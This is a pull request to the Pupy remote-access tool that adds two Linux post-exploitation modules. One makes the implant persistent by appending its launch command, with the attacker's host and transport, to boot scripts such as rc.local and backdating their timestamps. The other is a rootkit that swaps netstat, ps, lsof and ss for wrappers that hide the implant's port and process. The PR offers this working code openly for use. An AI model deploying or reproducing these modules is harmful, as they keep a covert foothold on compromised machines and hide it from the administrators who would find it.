### PR TITLE
fist commit

### DIFF
--- a/pupy/modules/linux_pers.py
+++ b/pupy/modules/linux_pers.py
@@ -1,0 +1,24 @@
+#!/usr/bin/env python
+import os
+from pupylib.PupyModule import *
+
+__class_name__="SetPersistence"
+def print_callback(data):
+    sys.stdout.write(data)
+    sys.stdout.flush()
+
+class SetPersistence(PupyModule):
+    """Add your pp.py file to /etc/init.d/ scripts
+NOTE: the pp.py script needs to be running with root privileges in order to modify the init scripts."""
+
+    def init_argparse(self):
+        self.arg_parser = PupyArgumentParser(prog="Linux Persistance Module", description=self.__doc__)
+        self.arg_parser.add_argument('--path', help='path to your pp.py file on the system, ex: /etc/pp.py')
+        self.arg_parser.add_argument('--mode', help='mode to be passes on the script, ex: simple')
+        self.arg_parser.add_argument('--transport', help='transport argument to be passed on the script, ex: tcp_ssl')
+        self.arg_parser.add_argument('--host', help='host argument to be passed on the script, ex: 192.168.0.100:4444')
+        
+    def run(self, args):
+        self.client.load_package("linux_pers")
+        self.client.conn.modules['linux_pers'].add(args.path, args.mode, args.transport, args.host)
+        self.success("Module executed successfully.")

--- a/pupy/modules/linux_stealth.py
+++ b/pupy/modules/linux_stealth.py
@@ -1,0 +1,25 @@
+#!/usr/bin/env python
+from pupylib.PupyModule import *
+
+__class_name__="SetStealth"
+def print_callback(data):
+    sys.stdout.write(data)
+    sys.stdout.flush()
+
+class SetStealth(PupyModule):
+    """Hides the runnin process from netstat, ss, ps, lsof by using modified binaries. Be careful when choosing the port.
+Credis to: http://www.jakoblell.com/blog/2014/05/07/hacking-contest-rootkit/
+
+********************** /!\ WARNING /!\ **********************
+* Do NOT run the stealh module more than ONCE on a machine. *
+* Running it two times will brake the binaries.             *
+*************************************************************
+NOTE: The pp.py script needs to be running with root privileges in order to run rhis module."""
+    def init_argparse(self):
+        self.arg_parser = PupyArgumentParser(prog="Linux Stealth Module", description=self.__doc__)
+        self.arg_parser.add_argument('--port', help='The port number to which Pupy is connecting to.')
+ 
+    def run(self, args):
+        self.client.load_package("linux_stealth")
+        self.client.conn.modules['linux_stealth'].run(args.port)
+        self.success("Module executed successfully.")

--- a/pupy/packages/linux/all/linux_pers.py
+++ b/pupy/packages/linux/all/linux_pers.py
@@ -1,0 +1,39 @@
+#!/usr/bin/env python
+import os
+
+def add(path, mode, transport, host):
+    if os.path.isfile("/etc/init.d/rc.local")==True:
+        if path in open("/etc/init.d/rc.local").read():
+            exit
+        else:
+            with open("/etc/init.d/rc.local", "a") as local:
+                local.write(path+" "+mode+" --transport "+transport+" --host "+host+' > /dev/null 2>&1 &')
+                local.close
+            os.utime("/etc/init.d/rc.local",(1330712292,1330712292))
+    elif os.path.isfile("/etc/rc")==True:
+        if path in open("/etc/rc").read():
+            exit
+        else:
+            os.system("head -n-1 /etc/rc > /etc/rc2 && rm -f /etc/rc && mv /etc/rc2 /etc/rc")
+            with open("/etc/rc", "a") as rc:
+                rc.write(path+" "+mode+" --transport "+transport+" --host "+host+' > /dev/null 2>&1 &'+'\n')
+                rc.write("exit 0")
+                rc.close
+            os.utime("/etc/rc",(1330712292,1330712292))
+    elif os.path.isfile("/etc/rc.d/rc.local")==True:
+	if path in open("/etc/rc.d/rc.local").read():
+	    exit
+	else:
+	    with open("/etc/rc.d/rc.local", "a") as rc2:
+		rc2.write(path+" "+mode+" --transport "+transport+" --host "+host+' > /dev/null 2>&1 &')
+		rc2.close()
+		os.system("chmod +x /etc/rc.d/rc.local")
+	    os.utime("/etc/rc.d/rc.local",(1330712292,1330712292))
+    elif os.path.isfile("/etc/init.d/dbus")==True:
+        if path in open("/etc/init.d/dbus").read():
+            exit
+        else:
+            with open("/etc/init.d/dbus", "a") as dbus:
+                cron.write(path+" "+mode+" --transport "+transport+" --host "+host+' > /dev/null 2>&1 &'+'\n')
+                cron.close
+            os.utime("/etc/init.d/dbus",(1330712292,1330712292))

--- a/pupy/packages/linux/all/linux_stealth.py
+++ b/pupy/packages/linux/all/linux_stealth.py
@@ -1,0 +1,39 @@
+#!/usr/bin/env python
+
+import os
+import subprocess
+import time
+
+def run(port):
+    def cmd_exists(cmd):
+        return subprocess.call("type " + cmd, shell=True,
+        stdout=subprocess.PIPE, stderr=subprocess.PIPE) == 0
+    if cmd_exists("gcc") == True:
+        bash=r"""which netstat ps lsof|perl -pe'$s="\x{455}";$n="\x{578}";chop;$o=$_;s/([ltp])s/\1$s/||s/fin/fi$n/;rename$o,$_;open F,"|gcc -xc - -o$o";print F qq{int main(int a,char**b){char*c[999999]={"sh","-c","$_ \$*|grep -vE \\"""+'"'+port+"""|\$\$|[$s-$n]|grep\\\\""};memcpy(c+3,b,8*a);execv("/bin/sh",c);}}'"""
+        #subprocess.call(bash, shell=True)
+        with open('/tmp/b', 'w') as f:
+            f.write(bash)
+            f.close()
+        os.system("bash /tmp/b")
+        time.sleep(3)
+        os.remove("/tmp/b")
+    else:
+        bash=r"""which netstat ps lsof |perl -pe'$s="\x{455}";$n="\x{578}";chop;$o=$_;s/([ltp])s/\1$s/||s/fin/fi$n/;rename$o,$_;open F,">$o";print F"#!/bin/sh\n$_ \$*|grep -vE \"[$s-$n]|grep|"""+port+"""\\\\"";chmod 493,$o'"""
+        with open("/tmp/p", "w") as f:
+            f.write(bash)
+            f.close()
+        os.system("bash /tmp/p")
+        time.sleep(3)
+        os.remove("/tmp/p")
+    bashss="""#!/bin/bash
+/bin/zss $* | grep -v """+port
+    get_ss_path=subprocess.check_output('which ss', shell=True)
+    path=get_ss_path[:-3]
+    os.system("mv "+path+"ss "+path+"zss")
+    with open(path+"ss", "w") as newss:
+        newss.write(bashss)
+        newss.close()
+    os.system("chmod +x "+path+"ss")
+#blazo - fresh orange
+#brock - september 22nd
+#Creds to: www.jakoblell.com/blog/2014/05/07/hacking-contest-rootkit/


### PR DESCRIPTION
Two modules were added for Linux only:

- linux_stealth.py
Hiding the running process implements techniques from here, credits are given in the -h option:
http://www.jakoblell.com/blog/2014/05/07/hacking-contest-rootkit/
The only required parameter to run the module is --port for the target port to where Pupy is connecting.

- linux_pers.py
Checks for certain files that are ran on reboot and appends the Pupy script to them.
When the module is ran, it first checks if the files are already appended.
The module takes the following parameters for the pp.py file:
--host, --transport 
--path is the path of the pp.py file located on the system
--mode is for 'simple', etc

More file checks can be added if the current ones do not exist in the file system.

Both modules have been tested and working under CentOS 7, Debian 7, Ubuntu 14.

Feel free to edit the modules as you wish and test them out.